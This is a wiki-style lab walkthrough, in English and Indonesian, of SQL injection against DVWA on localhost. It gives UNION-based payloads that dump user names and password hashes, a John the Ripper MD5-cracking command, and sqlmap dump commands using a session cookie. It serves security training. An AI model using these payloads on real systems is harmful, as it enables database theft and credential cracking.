DVWA: SQLi blind
Revision as of 07:45, 4 March 2017 by Onnowpurbo (talk | contribs)
DVWA-BLIND SQL INJECTION : LOW Level
1. Open Local host http://localhost/dvwa
Username : Admin Password : Password
3.Select SQL Injection BLIND and column ID issued
1' and 1=1# 1' and 1=1 order by 2 #
5.ID: 'or' 1=1--
we can see there are 5 user
5. now see information table
1' and 1=0 union select null,table_name from information_schema.tables# 1' and 1=0 union select null,table_name from information_schema.columns where table_name='users #
7. Information table name from table user
1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users #
8. on the last lets see user name and password
1' and 1=0 union select null,concat(first_name,0x0a,password) from users #
9. we will crack the md5 password
copy the passowrd into kwrite and save with name hash next
root@bt:/pentest/passwords/john#./john --format=raw-md5 hash
OK GOOD LUCK
Exploit DVWA menggunakan SQLmap
- Login ke DVWA
- Pilih DVWA Security Low
- Pada user ID tulis '1
- Jalankan addon tamer di browser
- Lakukan di terminal,
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
--> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="
di peroleh dari addon tamer di browser.
- lihat tables
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
- lihat kolom di user tabel
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
- lihat field password & dump
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump